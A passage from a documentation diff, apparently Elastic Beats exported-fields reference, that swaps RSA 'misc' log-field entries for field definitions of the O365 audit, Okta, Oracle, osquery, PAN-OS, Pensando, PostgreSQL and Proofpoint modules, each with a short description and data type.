+*`o365.audit.GroupName`*:: + -- -This key captures the event category type as specified by the event source. - type: keyword -- -*`rsa.misc.reference_id`*:: +*`o365.audit.Id`*:: + -- -This key is used to capture an event id from the session directly - type: keyword -- -*`rsa.misc.version`*:: +*`o365.audit.ImplicitShare`*:: + -- -This key captures Version of the application or OS which is generating the event. - type: keyword -- -*`rsa.misc.disposition`*:: +*`o365.audit.IncidentId`*:: + -- -This key captures the The end state of an action. - type: keyword -- -*`rsa.misc.result_code`*:: +*`o365.audit.InternalLogonType`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - type: keyword -- -*`rsa.misc.category`*:: +*`o365.audit.InterSystemsId`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - type: keyword -- -*`rsa.misc.obj_name`*:: +*`o365.audit.IntraSystemId`*:: + -- -This is used to capture name of object - type: keyword -- -*`rsa.misc.obj_type`*:: +*`o365.audit.IsDocLib`*:: + -- -This is used to capture type of object - -type: keyword +type: boolean -- -*`rsa.misc.event_source`*:: +*`o365.audit.Item.*`*:: + -- -This key captures Source of the event that’s not a hostname - -type: keyword +type: object -- -*`rsa.misc.log_session_id`*:: +*`o365.audit.Item.*.*`*:: + -- -This key is used to capture a sessionid from the session directly - -type: keyword +type: object -- -*`rsa.misc.group`*:: +*`o365.audit.ItemCount`*:: + -- -This key captures the Group Name value - -type: keyword +type: long -- -*`rsa.misc.policy_name`*:: +*`o365.audit.ItemName`*:: + -- -This key is used to capture the Policy Name only. - type: keyword -- -*`rsa.misc.rule_name`*:: +*`o365.audit.ItemType`*:: + -- -This key captures the Rule Name - type: keyword -- -*`rsa.misc.context`*:: +*`o365.audit.ListBaseTemplateType`*:: + -- -This key captures Information which adds additional context to the event. - type: keyword -- -*`rsa.misc.change_new`*:: +*`o365.audit.ListBaseType`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.space`*:: +*`o365.audit.ListColor`*:: + -- type: keyword -- -*`rsa.misc.client`*:: +*`o365.audit.ListIcon`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - type: keyword -- -*`rsa.misc.msgIdPart1`*:: +*`o365.audit.ListId`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart2`*:: +*`o365.audit.ListTitle`*:: + -- type: keyword -- -*`rsa.misc.change_old`*:: +*`o365.audit.ListItemUniqueId`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.operation_id`*:: +*`o365.audit.LogonError`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - type: keyword -- -*`rsa.misc.event_state`*:: +*`o365.audit.LogonType`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - type: keyword -- -*`rsa.misc.group_object`*:: +*`o365.audit.LogonUserSid`*:: + -- -This key captures a collection/grouping of entities. Specific usage - type: keyword -- -*`rsa.misc.node`*:: +*`o365.audit.MailboxGuid`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - type: keyword -- -*`rsa.misc.rule`*:: +*`o365.audit.MailboxOwnerMasterAccountSid`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`o365.audit.MailboxOwnerSid`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - type: keyword -- -*`rsa.misc.param`*:: +*`o365.audit.MailboxOwnerUPN`*:: + -- -This key is the parameters passed as part of a command or application, etc. - type: keyword -- -*`rsa.misc.change_attrib`*:: +*`o365.audit.Members`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - -type: keyword +type: array -- -*`rsa.misc.event_computer`*:: +*`o365.audit.Members.*`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - -type: keyword +type: object -- -*`rsa.misc.reference_id1`*:: +*`o365.audit.ModifiedProperties.*.*`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - -type: keyword +type: object -- -*`rsa.misc.event_log`*:: +*`o365.audit.Name`*:: + -- -This key captures the Name of the event log - type: keyword -- -*`rsa.misc.OS`*:: +*`o365.audit.ObjectId`*:: + -- -This key captures the Name of the Operating System - type: keyword -- -*`rsa.misc.terminal`*:: +*`o365.audit.Operation`*:: + -- -This key captures the Terminal Names only - type: keyword -- -*`rsa.misc.msgIdPart3`*:: +*`o365.audit.OrganizationId`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`o365.audit.OrganizationName`*:: + -- -This key captures Filter used to reduce result set - type: keyword -- -*`rsa.misc.serial_number`*:: +*`o365.audit.OriginatingServer`*:: + -- -This key is the Serial number associated with a physical asset. - type: keyword -- -*`rsa.misc.checksum`*:: +*`o365.audit.Parameters.*`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - -type: keyword +type: object -- -*`rsa.misc.event_user`*:: +*`o365.audit.PolicyDetails`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. - -type: keyword +type: array -- -*`rsa.misc.virusname`*:: +*`o365.audit.PolicyId`*:: + -- -This key captures the name of the virus - type: keyword -- -*`rsa.misc.content_type`*:: +*`o365.audit.RecordType`*:: + -- -This key is used to capture Content Type only. - type: keyword -- -*`rsa.misc.group_id`*:: +*`o365.audit.ResultStatus`*:: + -- -This key captures Group ID Number (related to the group name) - type: keyword -- -*`rsa.misc.policy_id`*:: +*`o365.audit.SensitiveInfoDetectionIsIncluded`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - type: keyword -- -*`rsa.misc.vsys`*:: +*`o365.audit.SharePointMetaData.*`*:: + -- -This key captures Virtual System Name - -type: keyword +type: object -- -*`rsa.misc.connection_id`*:: +*`o365.audit.SessionId`*:: + -- -This key captures the Connection ID - type: keyword -- -*`rsa.misc.reference_id2`*:: +*`o365.audit.Severity`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - type: keyword -- -*`rsa.misc.sensor`*:: +*`o365.audit.Site`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - type: keyword -- -*`rsa.misc.sig_id`*:: +*`o365.audit.SiteUrl`*:: + -- -This key captures IDS/IPS Int Signature ID - -type: long +type: keyword -- -*`rsa.misc.port_name`*:: +*`o365.audit.Source`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`o365.audit.SourceFileExtension`*:: + -- -This key captures the Rule group name - type: keyword -- -*`rsa.misc.risk_num`*:: +*`o365.audit.SourceFileName`*:: + -- -This key captures a Numeric Risk value - -type: double +type: keyword -- -*`rsa.misc.trigger_val`*:: +*`o365.audit.SourceRelativeUrl`*:: + -- -This key captures the Value of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.log_session_id1`*:: +*`o365.audit.Status`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - type: keyword -- -*`rsa.misc.comp_version`*:: +*`o365.audit.SupportTicketId`*:: + -- -This key captures the Version level of a sub-component of a product. - type: keyword -- -*`rsa.misc.content_version`*:: +*`o365.audit.Target`*:: + -- -This key captures Version level of a signature or database content. - -type: keyword +type: array -- -*`rsa.misc.hardware_id`*:: +*`o365.audit.TargetContextId`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - type: keyword -- -*`rsa.misc.risk`*:: +*`o365.audit.TargetUserOrGroupName`*:: + -- -This key captures the non-numeric risk value - type: keyword -- -*`rsa.misc.event_id`*:: +*`o365.audit.TargetUserOrGroupType`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`o365.audit.TeamName`*:: + -- type: keyword -- -*`rsa.misc.status`*:: +*`o365.audit.TeamGuid`*:: + -- type: keyword -- -*`rsa.misc.mail_id`*:: +*`o365.audit.TemplateTypeId`*:: + -- -This key is used to capture the mailbox id/name - type: keyword -- -*`rsa.misc.rule_uid`*:: +*`o365.audit.UniqueSharingId`*:: + -- -This key is the Unique Identifier for a rule. - type: keyword -- -*`rsa.misc.trigger_desc`*:: +*`o365.audit.UserAgent`*:: + -- -This key captures the Description of the trigger or threshold condition. - type: keyword -- -*`rsa.misc.inout`*:: +*`o365.audit.UserId`*:: + -- type: keyword -- -*`rsa.misc.p_msgid`*:: +*`o365.audit.UserKey`*:: + -- type: keyword -- -*`rsa.misc.data_type`*:: +*`o365.audit.UserType`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart4`*:: +*`o365.audit.Version`*:: + -- type: keyword -- -*`rsa.misc.error`*:: +*`o365.audit.WebId`*:: + -- -This key captures All non successful Error codes or responses - type: keyword -- -*`rsa.misc.index`*:: +*`o365.audit.Workload`*:: + -- type: keyword -- -*`rsa.misc.listnum`*:: +*`o365.audit.YammerNetworkId`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - type: keyword -- -*`rsa.misc.ntype`*:: -+ --- -type: keyword +[[exported-fields-okta]] +== Okta fields --- +Module for handling system logs from Okta. -*`rsa.misc.observed_val`*:: -+ --- -This key captures the Value observed (from the perspective of the device generating the log). -type: keyword --- +[float] +=== okta -*`rsa.misc.policy_value`*:: -+ --- -This key captures the contents of the policy. This contains details about the policy +Fields from Okta. -type: keyword --- -*`rsa.misc.pool_name`*:: +*`okta.uuid`*:: + -- -This key captures the name of a resource pool +The unique identifier of the Okta LogEvent. + type: keyword -- -*`rsa.misc.rule_template`*:: +*`okta.event_type`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template +The type of the LogEvent. + type: keyword -- -*`rsa.misc.count`*:: +*`okta.version`*:: + -- -type: keyword +The version of the LogEvent. --- -*`rsa.misc.number`*:: -+ --- type: keyword -- -*`rsa.misc.sigcat`*:: +*`okta.severity`*:: + -- -type: keyword +The severity of the LogEvent. Must be one of DEBUG, INFO, WARN, or ERROR. --- -*`rsa.misc.type`*:: -+ --- type: keyword -- -*`rsa.misc.comments`*:: +*`okta.display_message`*:: + -- -Comment information provided in the log message +The display message of the LogEvent. + type: keyword -- -*`rsa.misc.doc_number`*:: -+ --- -This key captures File Identification number +[float] +=== actor -type: long +Fields that let you store information of the actor for the LogEvent. --- -*`rsa.misc.expected_val`*:: + +*`okta.actor.id`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). +Identifier of the actor. + type: keyword -- -*`rsa.misc.job_num`*:: +*`okta.actor.type`*:: + -- -This key captures the Job Number +Type of the actor. + type: keyword -- -*`rsa.misc.spi_dst`*:: +*`okta.actor.alternate_id`*:: + -- -Destination SPI Index +Alternate identifier of the actor. + type: keyword -- -*`rsa.misc.spi_src`*:: +*`okta.actor.display_name`*:: + -- -Source SPI Index +Display name of the actor. + type: keyword -- -*`rsa.misc.code`*:: -+ --- -type: keyword +[float] +=== client --- +Fields that let you store information about the client of the actor. -*`rsa.misc.agent_id`*:: + + +*`okta.client.ip`*:: + -- -This key is used to capture agent id +The IP address of the client. -type: keyword --- +type: ip -*`rsa.misc.message_body`*:: -+ -- -This key captures the The contents of the message body. -type: keyword +[float] +=== user_agent --- +Fields about the user agent information of the client. -*`rsa.misc.phone`*:: -+ --- -type: keyword --- -*`rsa.misc.sig_id_str`*:: +*`okta.client.user_agent.raw_user_agent`*:: + -- -This key captures a string object of the sigid variable. +The raw informaton of the user agent. + type: keyword -- -*`rsa.misc.cmd`*:: +*`okta.client.user_agent.os`*:: + -- +The OS informaton. + + type: keyword -- -*`rsa.misc.misc`*:: +*`okta.client.user_agent.browser`*:: + -- +The browser informaton of the client. + + type: keyword -- -*`rsa.misc.name`*:: +*`okta.client.zone`*:: + -- +The zone information of the client. + + type: keyword -- -*`rsa.misc.cpu`*:: +*`okta.client.device`*:: + -- -This key is the CPU time used in the execution of the event being recorded. +The information of the client device. -type: long + +type: keyword -- -*`rsa.misc.event_desc`*:: +*`okta.client.id`*:: + -- -This key is used to capture a description of an event available directly or inferred +The identifier of the client. + type: keyword -- -*`rsa.misc.sig_id1`*:: -+ --- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id +[float] +=== outcome -type: long +Fields that let you store information about the outcome. --- -*`rsa.misc.im_buddyid`*:: + +*`okta.outcome.reason`*:: + -- -type: keyword +The reason of the outcome. --- -*`rsa.misc.im_client`*:: -+ --- type: keyword -- -*`rsa.misc.im_userid`*:: +*`okta.outcome.result`*:: + -- -type: keyword +The result of the outcome. Must be one of: SUCCESS, FAILURE, SKIPPED, ALLOW, DENY, CHALLENGE, UNKNOWN. --- -*`rsa.misc.pid`*:: -+ --- type: keyword -- -*`rsa.misc.priority`*:: +*`okta.target`*:: + -- -type: keyword +The list of targets. --- -*`rsa.misc.context_subject`*:: -+ +type: array + -- -This key is to be used in an audit context where the subject is the object being identified -type: keyword +[float] +=== transaction --- +Fields that let you store information about related transaction. -*`rsa.misc.context_target`*:: + + +*`okta.transaction.id`*:: + -- +Identifier of the transaction. + + type: keyword -- -*`rsa.misc.cve`*:: +*`okta.transaction.type`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. +The type of transaction. Must be one of "WEB", "JOB". + + +type: keyword + +-- + +[float] +=== debug_context + +Fields that let you store information about the debug context. + + + +[float] +=== debug_data + +The debug data. + + + +*`okta.debug_context.debug_data.device_fingerprint`*:: ++ +-- +The fingerprint of the device. + + +type: keyword + +-- + +*`okta.debug_context.debug_data.request_id`*:: ++ +-- +The identifier of the request. + + +type: keyword + +-- + +*`okta.debug_context.debug_data.request_uri`*:: ++ +-- +The request URI. + + +type: keyword + +-- + +*`okta.debug_context.debug_data.threat_suspected`*:: ++ +-- +Threat suspected. + + +type: keyword + +-- + +*`okta.debug_context.debug_data.url`*:: ++ +-- +The URL. + + +type: keyword + +-- + +[float] +=== authentication_context + +Fields that let you store information about authentication context. + + + +*`okta.authentication_context.authentication_provider`*:: ++ +-- +The information about the authentication provider. Must be one of OKTA_AUTHENTICATION_PROVIDER, ACTIVE_DIRECTORY, LDAP, FEDERATION, SOCIAL, FACTOR_PROVIDER. + + +type: keyword + +-- + +*`okta.authentication_context.authentication_step`*:: ++ +-- +The authentication step. + + +type: integer + +-- + +*`okta.authentication_context.credential_provider`*:: ++ +-- +The information about credential provider. Must be one of OKTA_CREDENTIAL_PROVIDER, RSA, SYMANTEC, GOOGLE, DUO, YUBIKEY. + + +type: keyword + +-- + +*`okta.authentication_context.credential_type`*:: ++ +-- +The information about credential type. Must be one of OTP, SMS, PASSWORD, ASSERTION, IWA, EMAIL, OAUTH2, JWT, CERTIFICATE, PRE_SHARED_SYMMETRIC_KEY, OKTA_CLIENT_SESSION, DEVICE_UDID. + + +type: keyword + +-- + +*`okta.authentication_context.issuer`*:: ++ +-- +The information about the issuer. + + +type: array + +-- + +*`okta.authentication_context.external_session_id`*:: ++ +-- +The session identifer of the external session if any. + + +type: keyword + +-- + +*`okta.authentication_context.interface`*:: ++ +-- +The interface used. e.g., Outlook, Office365, wsTrust + + +type: keyword + +-- + +[float] +=== security_context + +Fields that let you store information about security context. + + + +[float] +=== as + +The autonomous system. + + + +*`okta.security_context.as.number`*:: ++ +-- +The AS number. + + +type: integer + +-- + +[float] +=== organization + +The organization that owns the AS number. + + + +*`okta.security_context.as.organization.name`*:: ++ +-- +The organization name. + + +type: keyword + +-- + +*`okta.security_context.isp`*:: ++ +-- +The Internet Service Provider. + + +type: keyword + +-- + +*`okta.security_context.domain`*:: ++ +-- +The domain name. + + +type: keyword + +-- + +*`okta.security_context.is_proxy`*:: ++ +-- +Whether it is a proxy or not. + + +type: boolean + +-- + +[float] +=== request + +Fields that let you store information about the request, in the form of list of ip_chain. + + + +[float] +=== ip_chain + +List of ip_chain objects. + + + +*`okta.request.ip_chain.ip`*:: ++ +-- +IP address. + + +type: ip + +-- + +*`okta.request.ip_chain.version`*:: ++ +-- +IP version. Must be one of V4, V6. + + +type: keyword + +-- + +*`okta.request.ip_chain.source`*:: ++ +-- +Source information. + + +type: keyword + +-- + +[float] +=== geographical_context + +Geographical information. + + + +*`okta.request.ip_chain.geographical_context.city`*:: ++ +-- +The city. + +type: keyword + +-- + +*`okta.request.ip_chain.geographical_context.state`*:: ++ +-- +The state. + +type: keyword + +-- + +*`okta.request.ip_chain.geographical_context.postal_code`*:: ++ +-- +The postal code. + +type: keyword + +-- + +*`okta.request.ip_chain.geographical_context.country`*:: ++ +-- +The country. + +type: keyword + +-- + +*`okta.request.ip_chain.geographical_context.geolocation`*:: ++ +-- +Geolocation information. + + +type: geo_point + +-- + +[[exported-fields-oracle]] +== Oracle fields + +Oracle Module + + + +[float] +=== oracle + +Fields from Oracle logs. + + + +[float] +=== database_audit + +Module for parsing Oracle Database audit logs + + + +*`oracle.database_audit.status`*:: ++ +-- +Database Audit Status. + + +type: keyword + +-- + +*`oracle.database_audit.session_id`*:: ++ +-- +Indicates the audit session ID number. + + +type: keyword + +-- + +*`oracle.database_audit.client.terminal`*:: ++ +-- +If available, the client terminal type, for example "pty". + + +type: keyword + +-- + +*`oracle.database_audit.client.address`*:: ++ +-- +The IP Address or Domain used by the client. + + +type: keyword + +-- + +*`oracle.database_audit.client.user`*:: ++ +-- +The user running the client or connection to the database. + + +type: keyword + +-- + +*`oracle.database_audit.database.user`*:: ++ +-- +The database user used to authenticate. + + +type: keyword + +-- + +*`oracle.database_audit.privilege`*:: ++ +-- +The privilege group related to the database user. + + +type: keyword + +-- + +*`oracle.database_audit.entry.id`*:: ++ +-- +Indicates the current audit entry number, assigned to each audit trail record. The audit entry.id sequence number is shared between fine-grained audit records and regular audit records. + + +type: keyword + +-- + +*`oracle.database_audit.database.host`*:: ++ +-- +Client host machine name. + + +type: keyword + +-- + +*`oracle.database_audit.action`*:: ++ +-- +The action performed during the audit event. This could for example be the raw query. + + +type: keyword + +-- + +*`oracle.database_audit.action_number`*:: ++ +-- +Action is a numeric value representing the action the user performed. The corresponding name of the action type is in the AUDIT_ACTIONS table. For example, action 100 refers to LOGON. + + +type: keyword + +-- + +*`oracle.database_audit.database.id`*:: ++ +-- +Database identifier calculated when the database is created. It corresponds to the DBID column of the V$DATABASE data dictionary view. + + +type: keyword + +-- + +*`oracle.database_audit.length`*:: ++ +-- +Refers to the total number of bytes used in this audit record. This number includes the trailing newline bytes (\n), if any, at the end of the audit record. + + +type: long + +-- + +[[exported-fields-osquery]] +== Osquery fields + +Fields exported by the `osquery` module + + + +[float] +=== osquery + + + + +[float] +=== result + +Common fields exported by the result metricset. + + + +*`osquery.result.name`*:: ++ +-- +The name of the query that generated this event. + + +type: keyword + +-- + +*`osquery.result.action`*:: ++ +-- +For incremental data, marks whether the entry was added or removed. It can be one of "added", "removed", or "snapshot". + + +type: keyword + +-- + +*`osquery.result.host_identifier`*:: ++ +-- +The identifier for the host on which the osquery agent is running. Normally the hostname. + + +type: keyword + +-- + +*`osquery.result.unix_time`*:: ++ +-- +Unix timestamp of the event, in seconds since the epoch. Used for computing the `@timestamp` column. + + +type: long + +-- + +*`osquery.result.calendar_time`*:: ++ +-- +String representation of the collection time, as formatted by osquery. + + +type: keyword + +-- + +[[exported-fields-panw]] +== panw fields + +Module for Palo Alto Networks (PAN-OS) + + + +[float] +=== panw + +Fields from the panw module. + + + +[float] +=== panos + +Fields for the Palo Alto Networks PAN-OS logs. + + + +*`panw.panos.ruleset`*:: ++ +-- +Name of the rule that matched this session. + + +type: keyword + +-- + +[float] +=== source + +Fields to extend the top-level source object. + + + +*`panw.panos.source.zone`*:: ++ +-- +Source zone for this session. + + +type: keyword + +-- + +*`panw.panos.source.interface`*:: ++ +-- +Source interface for this session. + + +type: keyword + +-- + +[float] +=== nat + +Post-NAT source address, if source NAT is performed. + + + +*`panw.panos.source.nat.ip`*:: ++ +-- +Post-NAT source IP. + + +type: ip + +-- + +*`panw.panos.source.nat.port`*:: ++ +-- +Post-NAT source port. + + +type: long + +-- + +[float] +=== destination + +Fields to extend the top-level destination object. + + + +*`panw.panos.destination.zone`*:: ++ +-- +Destination zone for this session. + + +type: keyword + +-- + +*`panw.panos.destination.interface`*:: ++ +-- +Destination interface for this session. + + +type: keyword + +-- + +[float] +=== nat + +Post-NAT destination address, if destination NAT is performed. + + + +*`panw.panos.destination.nat.ip`*:: ++ +-- +Post-NAT destination IP. + + +type: ip + +-- + +*`panw.panos.destination.nat.port`*:: ++ +-- +Post-NAT destination port. + + +type: long + +-- + +*`panw.panos.endreason`*:: ++ +-- +The reason a session terminated. + + +type: keyword + +-- + +[float] +=== network + +Fields to extend the top-level network object. + + + +*`panw.panos.network.pcap_id`*:: ++ +-- +Packet capture ID for a threat. + + +type: keyword + +-- + + +*`panw.panos.network.nat.community_id`*:: ++ +-- +Community ID flow-hash for the NAT 5-tuple. + + +type: keyword + +-- + +[float] +=== file + +Fields to extend the top-level file object. + + + +*`panw.panos.file.hash`*:: ++ +-- +Binary hash for a threat file sent to be analyzed by the WildFire service. + + +type: keyword + +-- + +[float] +=== url + +Fields to extend the top-level url object. + + + +*`panw.panos.url.category`*:: ++ +-- +For threat URLs, it's the URL category. For WildFire, the verdict on the file and is either 'malicious', 'grayware', or 'benign'. + + +type: keyword + +-- + +*`panw.panos.flow_id`*:: ++ +-- +Internal numeric identifier for each session. + + +type: keyword + +-- + +*`panw.panos.sequence_number`*:: ++ +-- +Log entry identifier that is incremented sequentially. Unique for each log type. + + +type: long + +-- + +*`panw.panos.threat.resource`*:: ++ +-- +URL or file name for a threat. + + +type: keyword + +-- + +*`panw.panos.threat.id`*:: ++ +-- +Palo Alto Networks identifier for the threat. + + +type: keyword + +-- + +*`panw.panos.threat.name`*:: ++ +-- +Palo Alto Networks name for the threat. + + +type: keyword + +-- + +*`panw.panos.action`*:: ++ +-- +Action taken for the session. + +type: keyword + +-- + +*`panw.panos.type`*:: ++ +-- +Specifies the type of the log + +-- + +*`panw.panos.sub_type`*:: ++ +-- +Specifies the sub type of the log + +-- + +[[exported-fields-pensando]] +== Pensando fields + +pensando Module + + + +[float] +=== pensando + +Fields from Pensando logs. + + + +[float] +=== dfw + +Fields for Pensando DFW + + + +*`pensando.dfw.action`*:: ++ +-- +Action on the flow. + + +type: keyword + +-- + +*`pensando.dfw.app_id`*:: ++ +-- +Application ID + + +type: integer + +-- + +*`pensando.dfw.destination_address`*:: ++ +-- +Address of destination. + + +type: keyword + +-- + +*`pensando.dfw.destination_port`*:: ++ +-- +Port of destination. + + +type: integer + +-- + +*`pensando.dfw.direction`*:: ++ +-- +Direction of the flow + + +type: keyword + +-- + +*`pensando.dfw.protocol`*:: ++ +-- +Protocol of the flow + + +type: keyword + +-- + +*`pensando.dfw.rule_id`*:: ++ +-- +Rule ID that was matched. + + +type: keyword + +-- + +*`pensando.dfw.session_id`*:: ++ +-- +Session ID of the flow + + +type: integer + +-- + +*`pensando.dfw.session_state`*:: ++ +-- +Session state of the flow. + + +type: keyword + +-- + +*`pensando.dfw.source_address`*:: ++ +-- +Source address of the flow. + + +type: keyword + +-- + +*`pensando.dfw.source_port`*:: ++ +-- +Source port of the flow. + + +type: integer + +-- + +*`pensando.dfw.timestamp`*:: ++ +-- +Timestamp of the log. + + +type: date + +-- + +[[exported-fields-postgresql]] +== PostgreSQL fields + +Module for parsing the PostgreSQL log files. + + + +[float] +=== postgresql + +Fields from PostgreSQL logs. + + + +[float] +=== log + +Fields from the PostgreSQL log files. + + + +*`postgresql.log.timestamp`*:: ++ +-- + +deprecated:[7.3.0] + +The timestamp from the log line. + + +-- + +*`postgresql.log.core_id`*:: ++ +-- +Core id + + +type: long + +-- + +*`postgresql.log.database`*:: ++ +-- +Name of database + + +example: mydb + +-- + +*`postgresql.log.query`*:: ++ +-- +Query statement. + + +example: SELECT * FROM users; + +-- + +*`postgresql.log.query_step`*:: ++ +-- +Statement step when using extended query protocol (one of statement, parse, bind or execute) + + +example: parse + +-- + +*`postgresql.log.query_name`*:: ++ +-- +Name given to a query when using extended query protocol. If it is "", or not present, this field is ignored. + + +example: pdo_stmt_00000001 + +-- + +*`postgresql.log.error.code`*:: ++ +-- +Error code returned by Postgres (if any) + +type: long + +-- + +*`postgresql.log.timezone`*:: ++ +-- +type: alias + +alias to: event.timezone + +-- + +*`postgresql.log.thread_id`*:: ++ +-- +type: alias + +alias to: process.pid + +-- + +*`postgresql.log.user`*:: ++ +-- +type: alias + +alias to: user.name + +-- + +*`postgresql.log.level`*:: ++ +-- +type: alias + +alias to: log.level + +-- + +*`postgresql.log.message`*:: ++ +-- +type: alias + +alias to: message + +-- + +[[exported-fields-process]] +== Process fields + +Process metadata fields + + + + +*`process.exe`*:: ++ +-- +type: alias + +alias to: process.executable + +-- + +[[exported-fields-proofpoint]] +== Proofpoint Email Security fields + +proofpoint fields. + + + +*`network.interface.name`*:: ++ +-- +Name of the network interface where the traffic has been observed. + + +type: keyword + +-- + + + +*`rsa.internal.msg`*:: ++ +-- +This key is used to capture the raw message that comes into the Log Decoder + +type: keyword + +-- + +*`rsa.internal.messageid`*:: ++ +-- +type: keyword + +-- + +*`rsa.internal.event_desc`*:: ++ +-- +type: keyword + +-- + +*`rsa.internal.message`*:: ++ +-- +This key captures the contents of instant messages + +type: keyword + +-- + +*`rsa.internal.time`*:: ++ +-- +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. + +type: date + +-- + +*`rsa.internal.level`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.msg_id`*:: ++ +-- +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.msg_vid`*:: ++ +-- +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.data`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_server`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_val`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.resource`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_id`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.statement`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.audit_class`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.entry`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.hcode`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.inode`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.resource_class`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.dead`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.feed_desc`*:: ++ +-- +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.feed_name`*:: ++ +-- +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.cid`*:: ++ +-- +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_class`*:: ++ +-- +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_group`*:: ++ +-- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_host`*:: ++ +-- +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_ip`*:: ++ +-- +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.device_ipv6`*:: ++ +-- +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.device_type`*:: ++ +-- +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_type_id`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.did`*:: ++ +-- +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.entropy_req`*:: ++ +-- +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long + +-- + +*`rsa.internal.entropy_res`*:: ++ +-- +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long + +-- + +*`rsa.internal.event_name`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.feed_category`*:: ++ +-- +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword 